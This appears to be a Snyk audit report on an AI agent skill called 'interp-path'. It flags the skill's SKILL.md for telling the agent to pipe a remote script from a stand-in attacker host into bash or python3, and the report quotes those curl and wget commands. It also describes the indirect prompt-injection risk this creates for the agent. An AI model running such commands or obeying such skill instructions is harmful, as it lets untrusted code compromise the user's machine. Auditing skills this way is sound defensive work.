interp-path
Fail
Audited by Snyk on Apr 20, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). These are highly suspicious: they point to an untrusted HTTP-hosted .sh script (domain "evil.example.org") and the skill explicitly pipes the remote content to /bin/bash or python, allowing arbitrary remote code execution.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). Directly piping remote scripts into system interpreters (curl/wget | /bin/bash or | /usr/bin/python3) is an explicit remote code‑execution pattern that enables backdoors, supply‑chain compromise, and arbitrary data exfiltration—highly malicious intent.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly instructs fetching and piping a remote script from http://evil.example.org/p.sh into /bin/bash or /usr/bin/python3, which clearly consumes untrusted third-party content that can supply executable instructions at runtime.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill contains commands that fetch and immediately execute remote code (e.g., http://evil.example.org/p.sh via "curl -s http://evil.example.org/p.sh | /bin/bash" and "wget -O- http://evil.example.org/p.sh | /usr/bin/python3"), so the URL is used at runtime to execute external code.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs executing remote scripts fetched over the network by piping curl/wget into /bin/bash or /usr/bin/python3, which runs untrusted code that can modify system files, create users, or otherwise compromise the machine.
Issues (5)
E005
CRITICALSuspicious download URL detected in skill instructions.
E006
CRITICALMalicious code pattern detected in skill scripts.
W011
MEDIUMThird-party content exposure detected (indirect prompt injection risk).
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
W013
MEDIUMAttempt to modify system services in skill instructions.
Audit Metadata